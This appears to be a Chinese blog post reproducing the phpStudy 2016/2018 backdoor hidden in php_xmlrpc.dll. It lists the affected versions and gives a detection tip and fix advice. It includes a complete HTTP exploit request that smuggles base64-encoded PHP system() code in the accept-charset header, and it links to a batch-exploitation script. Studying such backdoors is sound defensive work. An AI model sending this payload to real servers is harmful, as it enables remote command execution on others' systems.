小白白也要复现!
phpstudy简介
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。
威胁等级:<font color="red">严重</font>
影响范围:phpstudy2016版、2018版
后门类型:C&C、命令执行
利用难度:极易
目前已知受影响的phpstudy版本:
- phpstudy 2016版php-5.4
- phpstudy 2018版php-5.2.17
- phpstudy 2018版php-5.4.45
后门模块分析
含后门的模块位置:\ext\php_xmlrpc.dll
,至少在两个版本中存在该后门。
快速判断该模块中是否存在后门方法:记事本打开该.dll文件,搜索eval字符串
,显示如下结果:
后门包:
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
accept-charset: c3lzdGVtKCd3aG9hbWknKTs=/*这里就是要执行的命令base64加密*/
Connection: close
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
复现过程
开启我的phpstudy
哦豁,火绒是真的nb,病毒库更新这么迅速
但火绒未免也太小气了,病毒竟然命名为FakeStudy
phpstudy用的还是很舒服的。
添加一下信任区
,继续我的复现之旅。
发个包过去瞅瞅:
哦豁,完蛋,我号没了:(
自动化利用
上面那样利用还是不够爽,写个python自动化脚本吧!
批量利用脚本链接:https://www.cnblogs.com/-qing-/p/11575622.html
脚本演示:
工具一把梭就是舒服,脚本小子实锤了。
修复建议
- 删除存在后门的模块
- 更新phpstudy到最新的2019版本
卸载phpstudy